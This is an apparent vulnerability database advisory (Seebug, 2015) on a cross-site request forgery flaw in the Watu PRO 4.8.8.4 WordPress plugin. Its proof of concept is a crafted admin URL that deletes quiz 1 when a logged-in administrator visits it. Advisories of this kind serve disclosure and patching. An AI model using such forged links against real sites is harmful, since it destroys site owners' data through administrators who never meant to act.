Watu PRO 4.8.8.4 - CSRF

2015-09-06T00:00:00
ID SSV:89341
Type seebug
Reporter Root
Modified 2015-09-06T00:00:00

Description

<p>Assuming there is a quiz with ID 1, the following link will delete it when visited by a logged-in admin:<br></p><p><a href="http://localhost/wp-admin/admin.php?page=watupro_exams&action=delete&quiz=1" rel="nofollow">http://localhost/wp-admin/admin.php?page=watupro_exams&action=delete&quiz=1</a><br></p>